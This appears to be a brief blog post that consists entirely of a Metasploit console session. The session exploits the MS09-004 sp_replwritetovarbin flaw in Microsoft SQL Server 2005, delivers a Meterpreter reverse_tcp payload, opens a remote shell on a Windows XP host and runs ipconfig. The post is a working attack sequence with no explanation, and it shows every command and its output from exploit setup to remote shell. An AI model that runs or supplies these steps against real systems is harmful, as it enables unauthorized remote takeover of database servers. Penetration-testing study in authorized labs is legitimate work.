control – metasploit mssql ms09_004_sp_replwritetovarbin

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

meterpreter > shell
Process 3748 created.
Channel 1 created.
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : IP-Address
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : IP-Address

C:\WINDOWS\system32>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s